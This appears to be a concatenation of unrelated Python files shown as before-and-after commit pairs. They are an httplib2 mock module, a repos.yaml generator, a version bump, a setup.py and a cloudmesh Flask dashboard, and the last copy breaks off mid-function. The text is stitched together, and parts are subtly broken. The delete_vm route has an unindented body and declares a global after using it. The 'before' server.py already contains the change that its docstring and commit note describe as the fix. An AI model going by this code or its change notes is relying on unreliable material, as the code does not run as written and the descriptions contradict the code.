                connection_type=None):
        """Return the canned (response, content) pair; all args are ignored."""
        return httplib2.Response(self.headers), self.data
class HttpMockSequence(object):
    """Mock of httplib2.Http

    Replays a scripted sequence of responses: each call to request() pops
    the next (headers, body) pair supplied at construction time.

        http = HttpMockSequence([
            ({'status': '401'}, ''),
            ({'status': '200'}, '{"access_token":"1/3w","expires_in":3600}'),
            ({'status': '200'}, 'echo_request_headers'),
        ])
        resp, content = http.request("http://examples.com")

    Special content values trigger echo behaviours useful in testing:
        'echo_request_headers'          -> the request headers object
        'echo_request_headers_as_json'  -> the request headers as JSON
        'echo_request_body'             -> the request body
        'echo_request_uri'              -> the request uri
    """

    def __init__(self, iterable):
        """
        Args:
            iterable: iterable, a sequence of pairs of (headers, body)
        """
        self._iterable = iterable
        self.follow_redirects = True

    def request(self, uri,
                method='GET',
                body=None,
                headers=None,
                redirections=1,
                connection_type=None):
        """Pop and return the next scripted (response, content) pair."""
        status, payload = self._iterable.pop(0)
        response = httplib2.Response(status)
        # Echo directives are resolved with guard clauses; anything else
        # is returned verbatim.
        if payload == 'echo_request_headers':
            return response, headers
        if payload == 'echo_request_headers_as_json':
            return response, simplejson.dumps(headers)
        if payload == 'echo_request_body':
            return response, body
        if payload == 'echo_request_uri':
            return response, uri
        return response, payload
def set_user_agent(http, user_agent):
    """Set the user-agent on every request.

    Args:
        http - An instance of httplib2.Http
            or something that acts like it.
        user_agent: string, the value for the user-agent header.

    Returns:
        A modified instance of http that was passed in.

    Example:
        h = httplib2.Http()
        h = set_user_agent(h, "my-app-name/6.0")

    Most of the time the user-agent will be set doing auth, this is for the
    rare cases where you are accessing an unauthenticated endpoint.
    """
    wrapped_request = http.request

    # Replacement for 'httplib2.Http.request' that injects the header.
    def request_with_user_agent(uri, method='GET', body=None, headers=None,
                                redirections=httplib2.DEFAULT_MAX_REDIRECTS,
                                connection_type=None):
        """Add (or prepend to) the user-agent header, then delegate."""
        if headers is None:
            headers = {}
        has_agent = 'user-agent' in headers
        headers['user-agent'] = (
            user_agent + ' ' + headers['user-agent'] if has_agent
            else user_agent)
        return wrapped_request(uri, method, body, headers,
                               redirections, connection_type)

    http.request = request_with_user_agent
    return http
def tunnel_patch(http):
    """Tunnel PATCH requests over POST.

    Args:
        http - An instance of httplib2.Http
            or something that acts like it.

    Returns:
        A modified instance of http that was passed in.

    Example:
        h = httplib2.Http()
        h = tunnel_patch(h)

    Useful if you are running on a platform that doesn't support PATCH.
    Apply this last if you are using OAuth 1.0, as changing the method
    will result in a different signature.
    """
    request_orig = http.request

    # The closure that will replace 'httplib2.Http.request'.
    def new_request(uri, method='GET', body=None, headers=None,
                    redirections=httplib2.DEFAULT_MAX_REDIRECTS,
                    connection_type=None):
        """Rewrite a PATCH request as a POST with x-http-method-override."""
        if headers is None:
            headers = {}
        if method == 'PATCH':
            if 'oauth_token' in headers.get('authorization', ''):
                # The OAuth 1.0 signature covers the HTTP method, so
                # tunneling after signing invalidates the signature.
                logging.warning(
                    'OAuth 1.0 request made with Credentials after tunnel_patch.')
            headers['x-http-method-override'] = "PATCH"
            method = 'POST'
        resp, content = request_orig(uri, method, body, headers,
                                     redirections, connection_type)
        return resp, content

    http.request = new_request
    return http
|
#!/usr/bin/env python
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
    """Read repository paths from stdin and print a repos.yaml document.

    Each stdin line is expected to be a directory path (as produced by
    `find ... -type d`). Lines that are not directories, not git
    repositories, or not recognized as projects are skipped.
    """
    current_dir = os.path.dirname(os.path.abspath(__file__))
    with open(os.path.join(current_dir, 'config.yaml')) as f:
        # NOTE(review): yaml.load without an explicit Loader can execute
        # arbitrary tags; config.yaml is local/trusted here, but
        # yaml.safe_load would be safer -- confirm before changing.
        config = yaml.load(f)
    site_initial_action(config)
    repo_regex = re.compile(config['project_re'])
    repos = []
    for line in sys.stdin:
        abspath = line.strip()
        if not os.path.isdir(abspath):
            continue
        try:
            git.Repo(abspath)
        except git.errors.InvalidGitRepositoryError:
            # The line is not a git repository. Skip it.
            continue
        try:
            project = get_project_name(abspath, repo_regex)
        except NotProjectError:
            continue
        try:
            site_action(abspath, config, repo_regex)
        except NotProjectError:
            continue
        repos.append({'abspath': abspath, 'project': project})
    # Python 2 print statement: emits the YAML document to stdout.
    print yaml.dump(repos, default_flow_style=False)

if __name__ == '__main__':
    main()
Commit note: changed `git.errors` to `git.exc` (GitPython moved its exception classes to the `git.exc` module).
#!/usr/bin/env python
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
    """Read repository paths from stdin and print a repos.yaml document.

    Each stdin line is expected to be a directory path (as produced by
    `find ... -type d`). Lines that are not directories, not git
    repositories, or not recognized as projects are skipped.
    """
    current_dir = os.path.dirname(os.path.abspath(__file__))
    with open(os.path.join(current_dir, 'config.yaml')) as f:
        # NOTE(review): yaml.load without an explicit Loader can execute
        # arbitrary tags; yaml.safe_load would be safer -- confirm.
        config = yaml.load(f)
    site_initial_action(config)
    repo_regex = re.compile(config['project_re'])
    repos = []
    for line in sys.stdin:
        abspath = line.strip()
        if not os.path.isdir(abspath):
            continue
        try:
            git.Repo(abspath)
        except git.exc.InvalidGitRepositoryError:
            # The line is not a git repository. Skip it.
            continue
        try:
            project = get_project_name(abspath, repo_regex)
        except NotProjectError:
            continue
        try:
            site_action(abspath, config, repo_regex)
        except NotProjectError:
            continue
        repos.append({'abspath': abspath, 'project': project})
    # Python 2 print statement: emits the YAML document to stdout.
    print yaml.dump(repos, default_flow_style=False)

if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
    """Read repository paths from stdin and print a repos.yaml document.

    Each stdin line is expected to be a directory path (as produced by
    `find ... -type d`). Lines that are not directories, not git
    repositories, lack a master branch, or are not recognized as
    projects are skipped.
    """
    current_dir = os.path.dirname(os.path.abspath(__file__))
    with open(os.path.join(current_dir, 'config.yaml')) as f:
        # NOTE(review): yaml.load without an explicit Loader can execute
        # arbitrary tags; yaml.safe_load would be safer -- confirm.
        config = yaml.load(f)
    site_initial_action(config)
    repo_regex = re.compile(config['project_re'])
    repos = []
    for line in sys.stdin:
        abspath = line.strip()
        if not os.path.isdir(abspath):
            continue
        try:
            repo = git.Repo(abspath)
        except git.exc.InvalidGitRepositoryError:
            # The line is not a git repository. Skip it.
            continue
        if 'master' not in repo.heads:
            # Skip repositories without a master branch.
            continue
        try:
            project = get_project_name(abspath, repo_regex)
        except NotProjectError:
            continue
        try:
            site_action(abspath, config, repo_regex)
        except NotProjectError:
            continue
        repos.append({'abspath': abspath, 'project': project})
    # Python 2 print statement: emits the YAML document to stdout.
    print yaml.dump(repos, default_flow_style=False)

if __name__ == '__main__':
    main()
Commit note: the deployed copy of this file uses the site-specific testing shebang and the `sys.path` setup shown below.
#!/opt/Python-2.7.8-empty/bin/python
import sys
sys.path.insert(0, '/opt/codesearch_local_root/dependencies')
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
    """Read repository paths from stdin and print a repos.yaml document.

    Each stdin line is expected to be a directory path (as produced by
    `find ... -type d`). Lines that are not directories, not git
    repositories, lack a master branch, or are not recognized as
    projects are skipped.
    """
    current_dir = os.path.dirname(os.path.abspath(__file__))
    with open(os.path.join(current_dir, 'config.yaml')) as f:
        # NOTE(review): yaml.load without an explicit Loader can execute
        # arbitrary tags; yaml.safe_load would be safer -- confirm.
        config = yaml.load(f)
    site_initial_action(config)
    repo_regex = re.compile(config['project_re'])
    repos = []
    for line in sys.stdin:
        abspath = line.strip()
        if not os.path.isdir(abspath):
            continue
        try:
            repo = git.Repo(abspath)
        except git.exc.InvalidGitRepositoryError:
            # The line is not a git repository. Skip it.
            continue
        if 'master' not in repo.heads:
            # Skip repositories without a master branch.
            continue
        try:
            project = get_project_name(abspath, repo_regex)
        except NotProjectError:
            continue
        try:
            site_action(abspath, config, repo_regex)
        except NotProjectError:
            continue
        repos.append({'abspath': abspath, 'project': project})
    # Python 2 print statement: emits the YAML document to stdout.
    print yaml.dump(repos, default_flow_style=False)

if __name__ == '__main__':
    main()
|
#
__version__ = '1.6'
Update to 1.7 for the next release.
#
__version__ = '1.7'
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
# Read the long description and license text from the repo checkout.
with open('README.rst') as f:
    readme = f.read()
# NOTE(review): `license` shadows the builtin and passes the full LICENSE
# text as package metadata; a short identifier (e.g. 'MIT') is the
# convention -- confirm before changing.
with open('LICENSE') as f:
    license = f.read()

setup(
    name='nickITAPI',
    version='0.1.1',
    description='',
    long_description=readme,
    author='digIT',
    # author_email='',
    # url='',
    license=license,
    packages=find_packages(exclude=('tests', 'docs')),
    install_requires=['flask', 'requests',]
)
Commit note: added `ldap3` to the required modules (`install_requires`).
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
# Read the long description and license text from the repo checkout.
with open('README.rst') as f:
    readme = f.read()
# NOTE(review): `license` shadows the builtin and passes the full LICENSE
# text as package metadata; a short identifier (e.g. 'MIT') is the
# convention -- confirm before changing.
with open('LICENSE') as f:
    license = f.read()

setup(
    name='nickITAPI',
    version='0.1.1',
    description='',
    long_description=readme,
    author='digIT',
    # author_email='',
    # url='',
    license=license,
    packages=find_packages(exclude=('tests', 'docs')),
    install_requires=['flask', 'requests', 'ldap3']
)
|
import sys
sys.path.insert(0, './')
sys.path.insert(0, '../')
import os
import time
from flask import Flask, render_template, request
from flask_flatpages import FlatPages
from cloudmesh.cloudmesh import cloudmesh
from datetime import datetime
from cloudmesh.cm_config import cm_config
from datetime import datetime
import yaml
#### setting up reading path for the use of yaml################
default_path = '.futuregrid/cloudmesh.yaml'
home = os.environ['HOME']
filename = "%s/%s" % (home, default_path)
#### end of setting up reading path for the use of yaml################
# Flask / FlatPages configuration; picked up via app.config.from_object
# below because these names are module-level upper-case constants.
DEBUG = True
FLATPAGES_AUTO_RELOAD = DEBUG
FLATPAGES_EXTENSION = '.md'
"""
import pkg_resources
version = pkg_resources.get_distribution("flask_cm").version
"""
# Hard-coded version string (the pkg_resources lookup above is disabled).
version = "0.7.2"
# Module-global cloud state, refreshed once at import time.
clouds = cloudmesh()
clouds.refresh()
# clouds.load()
# AttributeError: cloudmesh instance has no attribute 'refresh'
# clouds.refresh()
# TEST CASE
######################################################################
# STARTING THE FLASK APP
######################################################################
app = Flask(__name__)
app.config.from_object(__name__)
pages = FlatPages(app)
######################################################################
# ACTIVATE STRUCTURE
######################################################################
def make_active(name):
    """Return the navigation-state dict with *name* marked 'active'.

    Every known section maps to the empty string except *name*, which
    maps to 'active' (used by the templates to highlight the nav entry).
    """
    sections = ('home', 'table', 'contact', 'flavors', 'images',
                'metric', 'profile', 'vm_info', 'projects')
    active = {section: "" for section in sections}
    active[name] = 'active'
    return active
######################################################################
# ROUTE: /
######################################################################
@app.route('/')
def index():
    """Render the landing page."""
    active = make_active('home')
    return render_template(
        'index.html', pages=pages, active=active, version=version)
######################################################################
# ROUTE: REFRESH
######################################################################
@app.route('/cm/refresh/')
@app.route('/cm/refresh/<cloud>/')
def refresh(cloud=None, server=None):
    """Refresh all cloud state, then re-render the table view.

    NOTE(review): the <cloud> URL argument is ignored -- this always
    refreshes everything; confirm whether per-cloud refresh was intended.
    """
    print "-> refresh", cloud, server  # Python 2 print statement
    global clouds
    clouds.refresh()
    return table()
######################################################################
# ROUTE: KILL
######################################################################
@app.route('/cm/kill/')
def kill_vms():
    """Kill all VMs via the `cm` command-line tool.

    NOTE(review): `cm` is not defined anywhere in this module, so this
    route raises NameError when hit -- confirm the intended import
    (presumably sh.cm or similar).
    """
    print "-> kill all"
    r = cm("--set", "quiet", "kill", _tty_in=True)
    return table()
######################################################################
# ROUTE: DELETE
######################################################################
@app.route('/cm/delete/<cloud>/<server>/')
def delete_vm(cloud=None, server=None):
print "-> delete", cloud, server
# if (cloud == 'india'):
# r = cm("--set", "quiet", "delete:1", _tty_in=True)
clouds.delete(cloud, server)
time.sleep(5)
global clouds
clouds.refresh()
return table()
######################################################################
# ROUTE: START
######################################################################
@app.route('/cm/start/<cloud>/')
def start_vm(cloud=None, server=None):
    """Start a new VM on *cloud* with hard-coded user/index/image args.

    NOTE(review): the "gvonlasz"/"001"/"dummy" arguments look like
    placeholders -- confirm before relying on this route.
    """
    print "*********** STARTVM", cloud
    print "-> start", cloud, server
    # if (cloud == 'india'):
    #    r = cm("--set", "quiet", "start:1", _tty_in=True)
    clouds.create(cloud, "gvonlasz", "001", "dummy")
    return table()
'''
#gregorss test
@app.route('/cm/metric/<startdate>/<enddate>/<host>')
def list_metric(cloud=None, server=None):
print "-> generate metric", startdate, endadte
#r = fg-metric(startdate, enddate, host, _tty_in=True)
return render_template('metric1.html',
startdate=startdate,
active=active,
version=version,
endate=enddate)
#return table()
'''
######################################################################
# ROUTE: SAVE
######################################################################
@app.route('/save/')
def save():
    """Persist the current cloud status, then re-render the table."""
    print "Saving the cloud status"
    global clouds
    clouds.save()
    return table()
######################################################################
# ROUTE: LOAD
######################################################################
@app.route('/load/')
def load():
    """Reload the saved cloud status, then re-render the table."""
    print "Loading the cloud status"
    global clouds
    clouds.load()
    return table()
######################################################################
# ROUTE: TABLE
######################################################################
@app.route('/table/')
def table():
    """Render the cloud/VM overview table."""
    global clouds
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M")
    # clouds.refresh("sierra-openstack")
    # note: the call to sierra is fake; it goes to india and relabels.
    return render_template(
        'table.html',
        updated=timestamp,
        keys="",  # ",".join(clouds.get_keys())
        clouds=clouds.clouds,
        image='myimage',
        pages=pages,
        active=make_active('table'),
        version=version)
######################################################################
# ROUTE: PROJECTS
######################################################################
@app.route('/projects/')
def project():
    """Render the projects page.

    Fix: pass the module-global `projects` dict under the template
    context name `projects` -- it was passed as `clouds`, which does not
    match the later revision of this view (see the fixed copy of this
    file, which uses projects=projects).
    """
    global projects
    active = make_active('projects')
    config = cm_config()
    dict_t = config.get()
    makeCloudDict(dict_t)  # side effect: populates the global `projects`
    return render_template('projects.html',
                           projects=projects,
                           active=active,
                           version=version)
######################################################################
# ROUTE: VM INFO
######################################################################
@app.route('/cm/info/<cloud>/<server>/')
def vm_info(cloud=None, server=None):
    """Render the detail page for one server on one cloud."""
    global clouds
    active = make_active('vm_info')
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M")
    server_record = clouds.clouds[cloud]['servers'][server]
    return render_template('vm_info.html',
                           updated=timestamp,
                           keys="",
                           server=server_record,
                           id=server,
                           cloudname=cloud,
                           active=active,
                           version=version,
                           table_fun=maketablefromdict)
def maketablefromdict(the_dict):
    """Recursively render a dict (or list of dicts) as nested HTML tables.

    Scalars are returned unchanged; dict keys are title-cased into the
    left-hand cells. Fix: use .items() (available on both Python 2 and
    3) instead of the Python-2-only .iteritems().
    """
    return_str = ''
    if isinstance(the_dict, dict):
        for name, value in the_dict.items():
            return_str = (return_str + '<tr><td>' + name.title() +
                          '</td><td>' + str(maketablefromdict(value)) +
                          '</td></tr>')
        return_str = '<table>' + return_str + '</table>'
        return return_str
    elif type(the_dict) is list:
        for element in the_dict:
            for name, value in element.items():
                return_str = (return_str + '<tr><td>' + name.title() +
                              '</td><td>' + str(maketablefromdict(value)) +
                              '</td></tr>')
        return_str = '<table>' + return_str + '</table>'
        return return_str
    else:
        return the_dict
######################################################################
# ROUTE: FLAVOR
######################################################################
def set_default_flavor(name, flavor_names):
    """Record *name* as the default flavor and build a radio-button map.

    Returns a dict mapping each flavor name to '' except the default,
    which maps to 'checked'. Side effect: updates the module-global
    `default_flavor`.
    """
    global default_flavor
    default_flavor = name
    selected = dict.fromkeys(flavor_names, "")
    selected[default_flavor] = 'checked'
    return selected
default_flavor = "m1.small"
def buildFlavorNamesArray(clouds):
    """Collect every flavor name across all clouds.

    Fix: use .items() (available on both Python 2 and 3) instead of the
    Python-2-only .iteritems().
    """
    flavor_names = []
    for name, cloud in clouds.items():
        for id, flavor in cloud['flavors'].items():
            flavor_names.append(flavor['name'])
    return flavor_names
#@app.route('/flavors/<cloud>/' )
@app.route('/flavors/', methods=['GET','POST'])
def display_flavors(cloud=None):
    """Show the flavor selection page and persist the chosen default.

    GET renders the radio-button list; POST writes the selected default
    flavor back into ~/.futuregrid/cloudmesh.yaml.
    NOTE(review): the cloud name is hard-coded to 'india-openstack' for
    both read and write -- confirm whether multi-cloud is intended.
    """
    flavor_names=buildFlavorNamesArray(clouds.clouds);
    # for debugging
    cloud = 'india-openstack'
    ############reading from yaml file ############
    config_flavor = cm_config()
    configurations= config_flavor.get(cloud) # name of default cloud will come here
    default_flavor=configurations['default_flavor']
    ############ end of reading from yaml file ############
    time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
    active = make_active('flavors')
    selected = set_default_flavor(default_flavor, flavor_names)
    if request.method == 'POST':
        default_flavor= request.form['selected_flavor']
        print default_flavor
        ############ writing in yaml file ############
        yamlFile= config_flavor.get();
        yamlFile['india-openstack']['default_flavor']=default_flavor;
        testDict={}
        testDict['cloudmesh']=yamlFile;
        # NOTE(review): plain open/close; a with-block would be safer.
        f = open(filename, "w")
        yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
        f.close()
        ############ end of writing in yaml file ############
        selected = set_default_flavor(default_flavor, flavor_names)
    if cloud == None:
        # NOTE(review): unreachable -- cloud is reassigned above, so the
        # else branch always runs.
        pass
    else:
        return render_template('flavor.html',
                               updated=time_now,
                               clouds=clouds.clouds,
                               active=active,
                               version=version,selected=selected)
######################################################################
# ROUTE: IMAGES
######################################################################
def set_default_image(name, image_names):
    """Record *name* as the default image and build a radio-button map.

    Returns a dict mapping each image name to '' except the default,
    which maps to 'checked'. Side effect: updates the module-global
    `default_image`. Fix: `print x` rewritten as `print(x)`, which
    prints identically for a single argument on Python 2 and is valid
    Python 3.
    """
    global default_image
    default_image = name
    selected = {}
    for name in image_names:
        selected[name] = ""
    selected[default_image] = 'checked'
    print(default_image)
    return selected
default_image = "ktanaka/ubuntu1204-ramdisk.manifest.xml"
def buildImageNamesArray(clouds):
    """Collect every image id across all clouds.

    Fix: use .items() (available on both Python 2 and 3) instead of the
    Python-2-only .iteritems().
    """
    image_names = []
    for name, cloud in clouds.items():
        for id, image in cloud['images'].items():
            image_names.append(id)
    return image_names
#@app.route('/images/<cloud>/')
@app.route('/images/', methods=['GET','POST'])
def display_images(cloud=None):
    """Show the image selection page and persist the chosen default.

    GET renders the radio-button list; POST writes the selected default
    image back into ~/.futuregrid/cloudmesh.yaml.
    NOTE(review): the cloud name is hard-coded to 'india-openstack' for
    both read and write -- confirm whether multi-cloud is intended.
    """
    # for debugging
    cloud = 'india-openstack'
    time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
    active = make_active('images')
    image_names=buildImageNamesArray(clouds.clouds);
    ############reading from yaml file ############
    config_image = cm_config()
    configurations= config_image.get(cloud) # name of default cloud will come here
    default_image=configurations['default_image']
    ############ end of reading from yaml file ############
    # default_image=image_names[0];
    selected = set_default_image(default_image, image_names)
    if request.method == 'POST':
        default_image= request.form['selected-image']
        print default_image
        ############ writing in yaml file ############
        yamlFile= config_image.get();
        yamlFile['india-openstack']['default_image']=default_image;
        testDict={}
        testDict['cloudmesh']=yamlFile;
        # NOTE(review): plain open/close; a with-block would be safer.
        f = open(filename, "w")
        yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
        f.close()
        ############ end of writing in yaml file ############
        selected = set_default_image(default_image, image_names)
    if cloud == None:
        # NOTE(review): unreachable -- cloud is reassigned above, so the
        # else branch always runs.
        pass
    else:
        return render_template('images.html',
                               updated=time_now,
                               clouds=clouds.clouds,
                               active=active,
                               version=version,selected=selected)
######################################################################
# ROUTE: TEST
######################################################################
def set_default_cloud(name, cloud_names):
    """Record *name* as the default cloud and build a radio-button map.

    Returns a dict mapping each cloud name to '' except the default,
    which maps to the literal attribute string 'checked = ""'. Side
    effect: updates the module-global `default_cloud`.
    """
    global default_cloud
    default_cloud = name
    selected = dict.fromkeys(cloud_names, "")
    selected[default_cloud] = 'checked = ""'
    return selected
default_cloud = "india-openstack"
@app.route('/gregor', methods=['GET','POST'])
def gregor():
    """Experimental cloud-selection form rendered as inline HTML.

    Reads the active cloud names from cm_config and remembers the chosen
    default in the module-global `default_cloud`.
    NOTE(review): the inline form below only offers the two hard-coded
    cloud names, regardless of what cm_config returns.
    """
    global default_cloud
    # default_cloud = "india-openstack"
    #added by shweta
    config_active = cm_config()
    dict_t = config_active.get('active')
    cloud_names = dict_t;
    print cloud_names;
    #end of additon by shweta
    #cloud_names = ["india-openstack", "sierra-openstack"] code written by Gregor commented by shweta
    selected = set_default_cloud(default_cloud, cloud_names)
    if request.method == 'POST':
        default_cloud= request.form['selected_cloud']
        print default_cloud
        selected = set_default_cloud(default_cloud, cloud_names)
    # The %(...)s placeholders are filled from the `selected` dict.
    return '''
<form action="" method="post">
<input type = "radio"
name = "selected_cloud"
id = "india-openstack"
value = "india-openstack"
%(india-openstack)s />
<label>india-openstack</label>
<input type = "radio"
name = "selected_cloud"
id = "sierra-openstack"
value = "sierra-openstack"
%(sierra-openstack)s/>
<label>sierra-openstack</label>
<input type=submit value=Update>
</form>''' %selected
######################################################################
# ROUTE: PROFILE
######################################################################
@app.route('/profile/')
def profile():
    """Render the user profile page with a cloud-credentials summary."""
    # bug the global var of the ditc should be used
    config = cm_config()
    dict_t = config.get()
    makeCloudDict(dict_t)  # side effect: populates the global `projects`
    active = make_active('profile')
    time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
    # Placeholder personal data rendered into the template as-is.
    persolalinfo = {'name': 'abc', 'data1': 'pqr'}
    # bug: I guess this is left over from my example
    # bug: the name of the clouds should be retrived from config. I guess this is left over from my example
    # NOTE(review): `cloudinfo` below is dead -- the template receives a
    # fresh makeCloudDict(dict_t) result instead.
    cloudinfo = {
        'openstak-india': {'type': 'openstack', 'host': 'india.futuregrid.org',
                           'username': 'shweta'}}
    return render_template('profile.html',
                           updated=time_now,
                           keys="", # ",".join(clouds.get_keys()),
                           cloudinfo=makeCloudDict(dict_t),
                           persolalinfo=persolalinfo,
                           active=active,
                           version=version)
def makeCloudDict(dict_t):
    """Flatten the cm_config dict into upper-cased per-cloud sub-dicts.

    Side effect: (re)populates the module-global `projects` dict with
    the eucalyptus 'fg*' project entries used by the projects page.
    NOTE(review): cloud matching is by substring against hard-coded
    names; a type/key-based test would be more robust (see the 'Bug'
    comment below).
    """
    cloudDict = {}
    cloudSubDict = {}
    cloudSubsubDict = {}
    ############# the below variables are used to display projects.html Here projects dict contains all the projects################
    project_content={}
    global projects;
    projects={};
    ########### end of variables for display of projects.html###########################
    for key, value in dict_t.iteritems():
        # Bug: this should be changed based on a test of type
        if "india-openstack" in key:
            for innerKey, innerValue in value.iteritems():
                # Strip the OS_/cm_ prefixes for display.
                innerKey = innerKey.replace("OS_", "")
                innerKey = innerKey.replace("cm_", "")
                cloudSubDict[innerKey.upper()] = innerValue
            cloudDict[key.upper()] = cloudSubDict
            cloudSubDict = {}
            print (cloudDict)
        if "india-eucalyptus" in key:
            for innerKey, innerValue in value.iteritems():
                if "fg" in innerKey:
                    # 'fg*' entries are projects: collect them separately.
                    for innermostKey, innermostValue in innerValue.iteritems():
                        project_content[innermostKey]=innermostValue
                        innermostKey = innermostKey.replace("EC2_", "")
                        cloudSubsubDict[innermostKey.upper()] = innermostValue
                    cloudDict[innerKey.upper()] = cloudSubsubDict
                    cloudSubsubDict = {}
                    projects[innerKey]=project_content;
                    project_content={};
                else:
                    innerKey = innerKey.replace("EC2_", "")
                    cloudSubDict[innerKey.upper()] = innerValue
                    cloudDict[key.upper()] = cloudSubDict
                    cloudSubDict = {}
        if "azure" in key:
            cloudSubDict = {}
            for innerKey, innerValue in value.iteritems():
                cloudSubDict[innerKey.upper()] = innerValue
            cloudDict[key.upper()] = cloudSubDict
            cloudSubDict = {}
    # print (cloudDict);
    return cloudDict
######################################################################
# ROUTE: METRIC
######################################################################
#@app.route('/metric/<s_date>/<e_date>/<user>/<cloud>/<host>/<period>/<metric>')
@app.route('/metric/main', methods=['POST', 'GET'])
def metric():
    """Render the metric page, passing the query-string filters through."""
    global clouds
    arg_names = ('s_date', 'e_date', 'user', 'cloud', 'host',
                 'period', 'metric')
    # Missing query parameters default to the empty string.
    args = {key: request.args.get(key, '') for key in arg_names}
    return render_template('metric.html',
                           clouds=clouds.get(),
                           metrics=clouds.get_metrics(args),
                           pages=pages,
                           active=make_active('metric'),
                           version=version)
######################################################################
# ROUTE: PAGES
######################################################################
@app.route('/<path:path>/')
def page(path):
    """Render a flat page, returning 404 when the path is unknown."""
    content = pages.get_or_404(path)
    return render_template('page.html',
                           page=content,
                           pages=pages,
                           active=make_active(str(path)),
                           version=version)
if __name__ == "__main__":
app.run()
Commit note: updated server.py — the projects page now receives the `projects` dict under the template context name `projects` (previously passed as `clouds`).
import sys
sys.path.insert(0, './')
sys.path.insert(0, '../')
import os
import time
from flask import Flask, render_template, request
from flask_flatpages import FlatPages
from cloudmesh.cloudmesh import cloudmesh
from datetime import datetime
from cloudmesh.cm_config import cm_config
from datetime import datetime
import yaml
#### setting up reading path for the use of yaml################
default_path = '.futuregrid/cloudmesh.yaml'
home = os.environ['HOME']
filename = "%s/%s" % (home, default_path)
#### end of setting up reading path for the use of yaml################
# Flask / FlatPages configuration; picked up via app.config.from_object
# below because these names are module-level upper-case constants.
DEBUG = True
FLATPAGES_AUTO_RELOAD = DEBUG
FLATPAGES_EXTENSION = '.md'
"""
import pkg_resources
version = pkg_resources.get_distribution("flask_cm").version
"""
# Hard-coded version string (the pkg_resources lookup above is disabled).
version = "0.7.2"
# Module-global cloud state, refreshed once at import time.
clouds = cloudmesh()
clouds.refresh()
# clouds.load()
# AttributeError: cloudmesh instance has no attribute 'refresh'
# clouds.refresh()
# TEST CASE
######################################################################
# STARTING THE FLASK APP
######################################################################
app = Flask(__name__)
app.config.from_object(__name__)
pages = FlatPages(app)
######################################################################
# ACTIVATE STRUCTURE
######################################################################
def make_active(name):
    """Return the navigation-state dict with *name* marked 'active'.

    Every known section maps to the empty string except *name*, which
    maps to 'active' (used by the templates to highlight the nav entry).
    """
    sections = ('home', 'table', 'contact', 'flavors', 'images',
                'metric', 'profile', 'vm_info', 'projects')
    active = {section: "" for section in sections}
    active[name] = 'active'
    return active
######################################################################
# ROUTE: /
######################################################################
@app.route('/')
def index():
    """Render the landing page."""
    active = make_active('home')
    return render_template(
        'index.html', pages=pages, active=active, version=version)
######################################################################
# ROUTE: REFRESH
######################################################################
@app.route('/cm/refresh/')
@app.route('/cm/refresh/<cloud>/')
def refresh(cloud=None, server=None):
    """Refresh all cloud state, then re-render the table view.

    NOTE(review): the <cloud> URL argument is ignored -- this always
    refreshes everything; confirm whether per-cloud refresh was intended.
    """
    print "-> refresh", cloud, server  # Python 2 print statement
    global clouds
    clouds.refresh()
    return table()
######################################################################
# ROUTE: KILL
######################################################################
@app.route('/cm/kill/')
def kill_vms():
    """Kill all VMs via the `cm` command-line tool.

    NOTE(review): `cm` is not defined anywhere in this module, so this
    route raises NameError when hit -- confirm the intended import.
    """
    print "-> kill all"
    r = cm("--set", "quiet", "kill", _tty_in=True)
    return table()
######################################################################
# ROUTE: DELETE
######################################################################
@app.route('/cm/delete/<cloud>/<server>/')
def delete_vm(cloud=None, server=None):
print "-> delete", cloud, server
# if (cloud == 'india'):
# r = cm("--set", "quiet", "delete:1", _tty_in=True)
clouds.delete(cloud, server)
time.sleep(5)
global clouds
clouds.refresh()
return table()
######################################################################
# ROUTE: START
######################################################################
@app.route('/cm/start/<cloud>/')
def start_vm(cloud=None, server=None):
    """Start a new VM on *cloud* with hard-coded user/index/image args.

    NOTE(review): the "gvonlasz"/"001"/"dummy" arguments look like
    placeholders -- confirm before relying on this route.
    """
    print "*********** STARTVM", cloud
    print "-> start", cloud, server
    # if (cloud == 'india'):
    #    r = cm("--set", "quiet", "start:1", _tty_in=True)
    clouds.create(cloud, "gvonlasz", "001", "dummy")
    return table()
'''
#gregorss test
@app.route('/cm/metric/<startdate>/<enddate>/<host>')
def list_metric(cloud=None, server=None):
print "-> generate metric", startdate, endadte
#r = fg-metric(startdate, enddate, host, _tty_in=True)
return render_template('metric1.html',
startdate=startdate,
active=active,
version=version,
endate=enddate)
#return table()
'''
######################################################################
# ROUTE: SAVE
######################################################################
@app.route('/save/')
def save():
    """Persist the current cloud status, then re-render the table."""
    print "Saving the cloud status"
    global clouds
    clouds.save()
    return table()
######################################################################
# ROUTE: LOAD
######################################################################
@app.route('/load/')
def load():
    """Reload the saved cloud status, then re-render the table."""
    print "Loading the cloud status"
    global clouds
    clouds.load()
    return table()
######################################################################
# ROUTE: TABLE
######################################################################
@app.route('/table/')
def table():
    """Render the cloud/VM overview table."""
    global clouds
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M")
    # clouds.refresh("sierra-openstack")
    # note: the call to sierra is fake; it goes to india and relabels.
    return render_template(
        'table.html',
        updated=timestamp,
        keys="",  # ",".join(clouds.get_keys())
